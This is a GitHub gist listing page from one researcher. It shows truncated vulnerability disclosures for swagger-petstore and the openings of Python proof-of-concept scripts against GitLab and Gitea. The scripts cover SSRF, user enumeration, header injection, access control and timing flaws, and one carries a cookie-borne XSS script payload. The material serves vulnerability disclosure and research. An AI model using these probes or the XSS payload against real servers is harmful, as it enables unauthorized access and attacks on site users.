Skip to content

Instantly share code, notes, and snippets.

View HouqiyuA's full-sized avatar

Hec HouqiyuA

1 follower · 0 following
View GitHub Profile
@HouqiyuA
HouqiyuA / gist:4efd1aac7c7c7ab0cd5db48d62541a74
Last active September 11, 2025 09:19
Incorrect Access Control
[Description]:
An issue in petstore v1.0.7 allows a remote attacker to perform arbitrary delete operations via the DELETE /pet/{petId} endpoint by bypassing API key authentication.
[Vulnerability Type]:
Incorrect Access Control
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@HouqiyuA
HouqiyuA / gist:9d2c3f0ba075d01631aff879546e419c
Last active September 11, 2025 09:15
xss_for_peststore
[Description]:
Cross Site Scripting (XSS) vulnerability in petstore v1.0.7 allows a remote attacker to execute arbitrary code via a crafted script to the /api/v3/pet interface.
[Vulnerability Type]:
Cross Site Scripting (XSS)
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@HouqiyuA
HouqiyuA / gist:3c36f78e8de9f6a3cfb0959477c07443
Last active November 11, 2025 06:04
Poc for Peststore Information Disclosure Vulnerability
[Description]:
An issue in petstore v1.0.7 allows a remote attacker to execute information disclosure via accessing a non-existent endpoint /cart. The server returns a 404-error page exposing sensitive information including the Servlet name (default) and server version.
[Vulnerability Type]:
Information Disclosure Vulnerability
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@HouqiyuA
HouqiyuA / gist:cdcbebdd2ade7b04687a4157db5bb3ec
Last active May 21, 2025 08:23
gitlab-ssrf
import requests
import json
import time
def test_idor_vulnerabilities():
host = "DEPLOYED_GITLAB_HOST"
port = "DEPLOYED GITLAB_PORT"
url = f"http://{host}:{port}/api/v4/ci/lint"
headers = {
@HouqiyuA
HouqiyuA / gist:9f3679797243cf06b1f6e70b6b7b9e1e
Created April 25, 2025 03:37
gitlab-CWE:208(Observable Timing Discrepancy)
import requests
import json
import time
def test_extended_vulnerabilities():
base_url = "http://GITLAB_HOST/api/v4/snippets"
original_token = "7_pwYNpdf9HZAZr1pkEy" # valid token
headers = {
"Accept": "application/json",
@HouqiyuA
HouqiyuA / gist:d7557a32a3672522feda6a004a0e907f
Created April 25, 2025 09:51
gitlab-head_injection
import requests
from urllib.parse import urljoin
# 配置目标地址和请求头
BASE_URL = "http://DEPLOYED_GITLAB_HOST"
ENDPOINT = "/api/v4/user/keys"
HEADERS = {
"Accept": "application/json",
"PRIVATE-TOKEN": "YOUR_TOKEN"
}
@HouqiyuA
HouqiyuA / gist:04f335b1b7df3bf3c5fdc1ea1f04e699
Created April 25, 2025 10:57
gitlab-User_Enumeration
import requests
import json
def test_user_enumeration(base_url, token, start_id=1, end_id=10):
"""
Test for user enumeration vulnerability by trying sequential user IDs
:param base_url: Base API URL (e.g., 'http://192.168.126.129:9980')
:param token: PRIVATE-TOKEN value
:param start_id: Starting user ID to test
:param end_id: Ending user ID to test
@HouqiyuA
HouqiyuA / gist:a74d07f7730b69dfa6ce9f14b4750095
Created April 28, 2025 12:58
gitea-reflected xss
import requests
TARGET_URL = "http://GITEAHOST/"
cookies = {
'lang': 'en-US"><script>alert("XSS")</script>'
}
@HouqiyuA
HouqiyuA / gist:1b5e3094d50be924b86910bd08b73c6a
Last active April 29, 2025 09:11
gitea_insecure_access_control
import requests
import json
import time
# Target
host = "192.168.126.129"
port = 3000
base_url = f"http://{host}:{port}"
# Original token from the sample
@HouqiyuA
HouqiyuA / gist:039de857c563aeca0f75bf266a0c9a0d
Last active September 25, 2025 11:47
Insecure Default Configuration
import requests
def test_error_handling():
base_url = "http://DEVLOPMENT_HOST:3000/api/v1/user/keys"
# Test cases for error handling analysis
test_cases = [
("empty_auth_header", {"Authorization": ""}),
]